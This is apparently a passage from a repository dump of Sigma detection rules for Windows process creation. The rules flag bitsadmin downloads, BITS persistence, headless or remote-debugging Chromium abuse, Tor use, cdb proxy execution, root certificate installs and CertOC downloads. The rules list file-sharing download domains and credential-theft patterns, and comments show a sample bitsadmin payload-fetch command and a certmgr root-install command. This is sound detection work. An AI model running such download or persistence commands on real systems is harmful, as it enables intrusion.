    "content": "title: File Download Via Bitsadmin\nid: d059842b-6b9d-4ed1-b5c3-5b89143c6ede\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\nauthor: Michael Haag, FPT.EagleEye\ndate: 2017-03-09\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_cmd:\n        CommandLine|contains: ' /transfer '\n    selection_cli_1:\n        CommandLine|contains:\n            - ' /create '\n            - ' /addfile '\n    selection_cli_2:\n        CommandLine|contains: 'http'\n    condition: selection_img and (selection_cmd or all of selection_cli_*)\nfalsepositives:\n    - Some legitimate apps use this, but limited.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - BITSAdmin BITS Download\n      technique: T1105\n      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml",
    "content": "title: Suspicious Download From Direct IP Via Bitsadmin\nid: 99c840f2-2012-46fd-9141-c761987550ef\nrelated:\n    - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7\n      type: similar\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file using an URL that contains an IP\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_extension:\n        CommandLine|contains:\n            - '://1'\n            - '://2'\n            - '://3'\n            - '://4'\n            - '://5'\n            - '://6'\n            - '://7'\n            - '://8'\n            - '://9'\n    filter_seven_zip:\n        CommandLine|contains: '://7-' # For https://7-zip.org/\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml",
    "content": "title: Suspicious Download From File-Sharing Website Via Bitsadmin\nid: 8518ed3d-f7c9-4601-a26c-f361a4256a0c\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file from a suspicious domain\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\n    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-28\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_domain:\n        CommandLine|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com' # bitsadmin /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll %PUBLIC%\\calc.dll\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: all of selection_*\nfalsepositives:\n    - Some legitimate apps use this, but limited.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - BITSAdmin BITS Download\n      technique: T1105\n      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml",
    "content": "title: File With Suspicious Extension Downloaded Via Bitsadmin\nid: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file with a suspicious extension\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-05-30\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_extension:\n        CommandLine|contains:\n            - '.7z'\n            - '.asax'\n            - '.ashx'\n            - '.asmx'\n            - '.asp'\n            - '.aspx'\n            - '.bat'\n            - '.cfm'\n            - '.cgi'\n            - '.chm'\n            - '.cmd'\n            - '.dll'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.jsp'\n            - '.jspx'\n            - '.log'\n            - '.png'\n            - '.ps1'\n            - '.psm1'\n            - '.rar'\n            - '.scf'\n            - '.sct'\n            - '.txt'\n            - '.vbe'\n            - '.vbs'\n            - '.war'\n            - '.wsf'\n            - '.wsh'\n            - '.xll'\n            - '.zip'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - BITSAdmin BITS Download\n      technique: T1105\n      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml",
    "content": "title: File Download Via Bitsadmin To A Suspicious Target Folder\nid: 2ddef153-167b-4e89-86b6-757a9e65dcac\nrelated:\n    - id: 6e30c82f-a9f8-4aab-b79c-7c12bce6f248\n      type: obsolete\n    - id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67\n      type: similar\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file to a suspicious target folder\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_folder:\n        CommandLine|contains:\n            - ':\\Perflogs'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\'\n            - '\\$Recycle.Bin\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Desktop\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\wwwroot\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - '\\Users\\Default\\'\n            - '\\Videos\\'\n            - '%ProgramData%'\n            - '%public%'\n            - '%temp%'\n            - '%tmp%'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - BITSAdmin BITS Download\n      technique: T1105\n      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml",
    "content": "title: Monitoring For Persistence Via BITS\nid: b9cbbc17-d00d-4e3d-a827-b06d03d2380d\nstatus: test\ndescription: |\n    BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.\n    When the job runs on the system the command specified in the BITS job will be executed.\n    This can be abused by actors to create a backdoor within the system and for persistence.\n    It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\n    - http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html\n    - https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394\nauthor: Sreeman\ndate: 2020-10-29\nmodified: 2024-01-25\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1197\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_cli_notify_1:\n        CommandLine|contains: '/SetNotifyCmdLine'\n    selection_cli_notify_2:\n        CommandLine|contains:\n            - '%COMSPEC%'\n            - 'cmd.exe'\n            - 'regsvr32.exe'\n    selection_cli_add_1:\n        CommandLine|contains: '/Addfile'\n    selection_cli_add_2:\n        CommandLine|contains:\n            - 'http:'\n            - 'https:'\n            - 'ftp:'\n            - 'ftps:'\n    condition: selection_img and (all of selection_cli_notify_* or all of selection_cli_add_*)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml",
    "content": "title: Potential Data Stealing Via Chromium Headless Debugging\nid: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4\nrelated:\n    - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449\n      type: derived\nstatus: test\ndescription: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control\nreferences:\n    - https://github.com/defaultnamehere/cookie_crimes/\n    - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password\n    - https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/\n    - https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-23\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1185\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '--remote-debugging-' # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc\n            - '--user-data-dir'\n            - '--headless'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml",
    "content": "title: Browser Execution In Headless Mode\nid: ef9dcfed-690c-4c5d-a9d1-482cd422225c\nrelated:\n    - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e\n      type: derived\nstatus: test\ndescription: Detects execution of Chromium based browser in headless mode\nreferences:\n    - https://twitter.com/mrd0x/status/1478234484881436672?s=12\n    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-12\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1105\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains: '--headless'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml",
    "content": "title: File Download with Headless Browser\nid: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e\nrelated:\n    - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c\n      type: derived\nstatus: test\ndescription: Detects execution of chromium based browser in headless mode using the \"dump-dom\" command line to download files\nreferences:\n    - https://twitter.com/mrd0x/status/1478234484881436672?s=12\n    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nauthor: Sreeman, Florian Roth (Nextron Systems)\ndate: 2022-01-04\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1105\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains|all:\n            - '--headless'\n            - 'dump-dom'\n            - 'http'\n    filter_optional_edge_1:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\'\n            - 'C:\\Program Files\\Microsoft\\Edge\\Application\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeWebView\\'\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftEdge'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n            - '\\MicrosoftEdge.exe'\n        CommandLine|contains: '--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom'\n    filter_optional_edge_2:\n        Image|contains:\n            - '\\AppData\\Local\\Microsoft\\WindowsApps\\'\n            - '\\Windows\\SystemApps\\Microsoft.MicrosoftEdge'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\MicrosoftEdge.exe'\n        CommandLine|contains: '--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml",
    "content": "title: Chromium Browser Instance Executed With Custom Extension\nid: 88d6e60c-759d-4ac1-a447-c0f1466c2d21\nrelated:\n    - id: 27ba3207-dd30-4812-abbf-5d20c57d474e\n      type: similar\nstatus: test\ndescription: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension\nreferences:\n    - https://redcanary.com/blog/chromeloader/\n    - https://emkc.org/s/RJjuLa\n    - https://www.mandiant.com/resources/blog/lnk-between-browsers\nauthor: Aedan Russell, frack113, X__Junior (Nextron Systems)\ndate: 2022-06-19\nmodified: 2023-11-28\ntags:\n    - attack.persistence\n    - attack.t1176.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains: '--load-extension='\n    condition: selection\nfalsepositives:\n    - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml",
    "content": "title: Chromium Browser Headless Execution To Mockbin Like Site\nid: 1c526788-0abe-4713-862f-b520da5e5316\nstatus: test\ndescription: Detects the execution of a Chromium based browser process with the \"headless\" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).\nreferences:\n    - https://www.zscaler.com/blogs/security-research/steal-it-campaign\nauthor: X__Junior (Nextron Systems)\ndate: 2023-09-11\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n    selection_headless:\n        CommandLine|contains: '--headless'\n    selection_url:\n        CommandLine|contains:\n            - '://run.mocky'\n            - '://mockbin'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml",
    "content": "title: Suspicious Chromium Browser Instance Executed With Custom Extension\nid: 27ba3207-dd30-4812-abbf-5d20c57d474e\nrelated:\n    - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21\n      type: similar\nstatus: test\ndescription: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension\nreferences:\n    - https://redcanary.com/blog/chromeloader/\n    - https://emkc.org/s/RJjuLa\n    - https://www.mandiant.com/resources/blog/lnk-between-browsers\nauthor: Aedan Russell, frack113, X__Junior (Nextron Systems)\ndate: 2022-06-19\nmodified: 2023-11-28\ntags:\n    - attack.persistence\n    - attack.t1176.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains: '--load-extension='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml",
    "content": "title: File Download From Browser Process Via Inline URL\nid: 94771a71-ba41-4b6e-a757-b531372eaab6\nstatus: test\ndescription: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.\nreferences:\n    - https://twitter.com/mrd0x/status/1478116126005641220\n    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-11\nmodified: 2025-10-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_extensions:\n        - CommandLine|endswith:\n              - '.7z'\n              - '.dat'\n              - '.dll'\n              - '.exe'\n              - '.hta'\n              - '.ps1'\n              - '.psm1'\n              - '.txt'\n              - '.vbe'\n              - '.vbs'\n              - '.zip'\n        - CommandLine|contains:\n              - '.7z\"'\n              - '.dat\"'\n              - '.dll\"'\n              - '.hta\"'\n              - '.ps1\"'\n              - '.psm1\"'\n              - '.txt\"'\n              - '.vbe\"'\n              - '.vbs\"'\n              - '.zip\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml",
    "content": "title: Browser Started with Remote Debugging\nid: b3d34dc5-2efd-4ae3-845f-8ec14921f449\nrelated:\n    - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4\n      type: derived\nstatus: test\ndescription: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks\nreferences:\n    - https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf\n    - https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/\n    - https://github.com/defaultnamehere/cookie_crimes/\n    - https://github.com/wunderwuzzi23/firefox-cookiemonster\nauthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-27\nmodified: 2022-12-23\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1185\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_chromium_based:\n        # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc\n        CommandLine|contains: ' --remote-debugging-'\n    selection_firefox:\n        Image|endswith: '\\firefox.exe'\n        CommandLine|contains: ' -start-debugger-server'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml",
    "content": "title: Tor Client/Browser Execution\nid: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c\nstatus: test\ndescription: Detects the use of Tor or Tor-Browser to connect to onion routing networks\nreferences:\n    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/\nauthor: frack113\ndate: 2022-02-20\nmodified: 2025-10-27\ntags:\n    - attack.command-and-control\n    - attack.t1090.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'Tor Browser'\n        - Product: 'Tor Browser'\n        - Image|endswith:\n              - '\\tor.exe'\n              - '\\Tor Browser\\Browser\\firefox.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_calc_uncommon_exec.yml",
    "content": "title: Suspicious Calculator Usage\nid: 737e618a-a410-49b5-bec3-9e55ff7fbc15\nstatus: test\ndescription: |\n    Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.\nreferences:\n    - https://twitter.com/ItsReallyNick/status/1094080242686312448\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-02-09\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains: '\\calc.exe '\n    selection_2:\n        Image|endswith: '\\calc.exe'\n    filter_main_known_locations:\n        Image|contains:\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n            - ':\\Windows\\WinSxS\\'\n    condition: selection_1 or ( selection_2 and not filter_main_known_locations )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_cdb_arbitrary_command_execution.yml",
    "content": "title: Potential Binary Proxy Execution Via Cdb.EXE\nid: b5c7395f-e501-4a08-94d4-57fe7a9da9d2\nstatus: test\ndescription: Detects usage of \"cdb.exe\" to launch arbitrary processes or commands from a debugger script file\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/\n    - https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html\n    - https://twitter.com/nas_bench/status/1534957360032120833\nauthor: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-10-26\nmodified: 2024-04-22\ntags:\n    - attack.execution\n    - attack.t1106\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cdb.exe'\n        - OriginalFileName: 'CDB.Exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' -c ' # Using a debugger script\n            - ' -cf '\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use of debugging tools\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml",
    "content": "title: New Root Certificate Installed Via CertMgr.EXE\nid: ff992eac-6449-4c60-8c1d-91c9722a1d48\nrelated:\n    - id: 42821614-9264-4761-acfc-5772c3286f76\n      type: derived\n    - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\n    Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\n    - https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/\nauthor: oscd.community, @redcanary, Zach Stanford @svch0st\ndate: 2023-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1553.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all\n    selection_img:\n        - Image|endswith: '\\CertMgr.exe'\n        - OriginalFileName: 'CERTMGT.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/add'\n            - 'root'\n    condition: all of selection_*\nfalsepositives:\n    - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certoc_download.yml",
    "content": "title: File Download via CertOC.EXE\nid: 70ad0861-d1fe-491c-a45f-fa48148a300d\nrelated:\n    - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a\n      type: similar\nstatus: test\ndescription: Detects when a user downloads a file by using CertOC.exe\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-16\nmodified: 2023-10-18\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certoc.exe'\n        - OriginalFileName: 'CertOC.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-GetCACAPS'\n            - 'http'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_certoc_download_direct_ip.yml",
    "content": "title: File Download From IP Based URL Via CertOC.EXE\nid: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a\nrelated:\n    - id: 70ad0861-d1fe-491c-a45f-fa48148a300d\n      type: similar\nstatus: test\ndescription: Detects when a user downloads a file from an IP based URL using CertOC.exe\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Certoc/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-18\ntags:\n    - attack.command-and-control\n    - attack.execution\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\certoc.exe'\n        - OriginalFileName: 'CertOC.exe'\n    selection_ip:\n        CommandLine|re: '://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_cli:\n        CommandLine|contains: '-GetCACAPS'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
